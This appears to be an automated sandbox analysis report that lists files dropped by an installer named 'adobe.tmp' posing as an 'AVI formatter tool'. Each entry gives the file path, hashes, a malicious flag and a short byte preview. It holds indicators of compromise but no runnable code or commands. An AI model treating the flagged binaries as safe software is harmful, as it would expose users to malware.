                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):112640
                                                                                                                                                        Entropy (8bit):6.540227486061059
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                                                                                        MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                                                                                        SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                                                                                        SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                                                                                        SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\takdec.exe (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):772608
                                                                                                                                                        Entropy (8bit):6.546391052615969
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                                                                                        MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                                                                                        SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                                                                                        SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                                                                                        SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\uchardet.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):294926
                                                                                                                                                        Entropy (8bit):6.191604766067493
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                                                                                        MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                                                                                        SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                                                                                        SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                                                                                        SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\utils.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):13838
                                                                                                                                                        Entropy (8bit):5.173769974589746
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                                                                                        MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                                                                                        SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                                                                                        SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                                                                                        SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\wavpackdll.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):258560
                                                                                                                                                        Entropy (8bit):6.491223412910377
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                                                                                        MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                                                                                        SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                                                                                        SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                                                                                        SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\is-D26SF.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):715038
                                                                                                                                                        Entropy (8bit):6.506117629405352
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:RRObekMtkfohrPUs37uzHnA6zgpKq35eERXprNrHIR3/j1vGgZpDExyc/:LObekYkfohrP337uzHnA6cgqpeEFHS9M
                                                                                                                                                        MD5:B3409D6A8032BDC34CC66F558D065980
                                                                                                                                                        SHA1:D9FADAD0B88C38243D51D5D600C021F7EB787365
                                                                                                                                                        SHA-256:2B7E19859B5E49083A988005C98C6E315B0B3D34C45AEACCB6C8E5DE68D4D94E
                                                                                                                                                        SHA-512:BDB716FFDB409CF64C121F4C8EBF1AF01DB004992187BA1CD667D237FC015657B1A4C6F668A3F86EA6DC138004D382A73BB8242AD53DA838FFB332E7843EC125
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f..........pr............@..............................................@...............................%..................................................................................................................CODE.....d.......f.................. ..`DATA.................j..............@...BSS..................|...................idata...%.......&...|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\is-RALFR.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1757184
                                                                                                                                                        Entropy (8bit):7.100391080204771
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:JAQ4shKtykNo8EEOSl9//ryooMLqSB1gmxAMGkTMWad6JNcED/RZVqL3zpUy0NuQ:JAshu19d/mwLqAgjga7n
                                                                                                                                                        MD5:553F6C0E3426D5D3D0332C31637B5232
                                                                                                                                                        SHA1:6D3BE1372F5E1427D67E9504E5A7E5759CD5F9BC
                                                                                                                                                        SHA-256:D0BCF991900B065DB2E8E0290548825BFB46C72D4198EBAFC06427AEE136237F
                                                                                                                                                        SHA-512:1BE7A24AC3D8B62FA1CA0E64A5ACAE1B97F7BFF53FD9A0CF6A3864BC89C1571F9CD60C85970C94A054086766A7D738EAE1C3B3AEA44AD198E6806D10531C913A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..................................... ....@.................................b........................................%...........#........................................................................... ...............................text............................... ..`.rdata...#... ...0... ..............@..@.data.... ...P.......P..............@....rsrc....#.......0...`..............@..@_vset_8..@.......@..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\stuff\date.txt (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:IFF data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1716
                                                                                                                                                        Entropy (8bit):4.781797138644031
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                                                                                        MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                                                                                        SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                                                                                        SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                                                                                        SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\stuff\is-6KE9F.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:IFF data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1716
                                                                                                                                                        Entropy (8bit):4.781797138644031
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                                                                                        MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                                                                                        SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                                                                                        SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                                                                                        SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\stuff\is-855RJ.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1825
                                                                                                                                                        Entropy (8bit):5.088030483893024
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                                                                                        MD5:992C00BEAB194CE392117BB419F53051
                                                                                                                                                        SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                                                                                        SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                                                                                        SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\stuff\is-J0PKV.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:IFF data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1716
                                                                                                                                                        Entropy (8bit):4.781797138644031
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                                                                                        MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                                                                                        SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                                                                                        SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                                                                                        SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\stuff\is-T3L2G.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1825
                                                                                                                                                        Entropy (8bit):5.088030483893024
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                                                                                        MD5:992C00BEAB194CE392117BB419F53051
                                                                                                                                                        SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                                                                                        SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                                                                                        SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\stuff\tagsreplace.txt (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1825
                                                                                                                                                        Entropy (8bit):5.088030483893024
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                                                                                        MD5:992C00BEAB194CE392117BB419F53051
                                                                                                                                                        SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                                                                                        SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                                                                                        SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\unins000.dat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:InnoSetup Log AVI formatter tool, version 0x30, 8188 bytes, 226546\user, "C:\Users\user\AppData\Local\AVI formatter tool"
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):8188
                                                                                                                                                        Entropy (8bit):4.996949785393219
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:CuZg5WgDX7pbbjHm4JOIhNH4cVSQs0LnrimDfMbS4m9VKvjr:Cz5WgD7pLGTIhycVSQ1nrimDfMvm9MP
                                                                                                                                                        MD5:8BD0F7BCB39EBD29CADC16E0218ADEAC
                                                                                                                                                        SHA1:E589260A04F7D0571765DC94794E3A2206F7723A
                                                                                                                                                        SHA-256:BF0416A84FFE3A0FE890A01359DF213102FD623117AFA98A8261B4E2508AAA9D
                                                                                                                                                        SHA-512:23CB6737198A8541C61776A730A99BC219F32931AF5A04754D06C13D4D60622576C490798801CCAFAE0E1FDEFCB2455B0C96617ACEEDA2D8A31E7B9BEB71EBDB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:Inno Setup Uninstall Log (b)....................................AVI formatter tool..............................................................................................................AVI formatter tool..............................................................................................................0...8.......%................................................................................................................e}.........J'........O....226546.user/C:\Users\user\AppData\Local\AVI formatter tool.............7.... .....t....2.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\unins000.exe (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):715038
                                                                                                                                                        Entropy (8bit):6.506117629405352
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:RRObekMtkfohrPUs37uzHnA6zgpKq35eERXprNrHIR3/j1vGgZpDExyc/:LObekYkfohrP337uzHnA6cgqpeEFHS9M
                                                                                                                                                        MD5:B3409D6A8032BDC34CC66F558D065980
                                                                                                                                                        SHA1:D9FADAD0B88C38243D51D5D600C021F7EB787365
                                                                                                                                                        SHA-256:2B7E19859B5E49083A988005C98C6E315B0B3D34C45AEACCB6C8E5DE68D4D94E
                                                                                                                                                        SHA-512:BDB716FFDB409CF64C121F4C8EBF1AF01DB004992187BA1CD667D237FC015657B1A4C6F668A3F86EA6DC138004D382A73BB8242AD53DA838FFB332E7843EC125
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f..........pr............@..............................................@...............................%..................................................................................................................CODE.....d.......f.................. ..`DATA.................j..............@...BSS..................|...................idata...%.......&...|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_RegDLL.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4096
                                                                                                                                                        Entropy (8bit):4.026670007889822
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                                                                                        MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                                                                                        SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                                                                                        SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                                                                                        SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_iscrypt.dll

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2560
                                                                                                                                                        Entropy (8bit):2.8818118453929262
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_isdecmp.dll

                                                                                                                                                        Download File
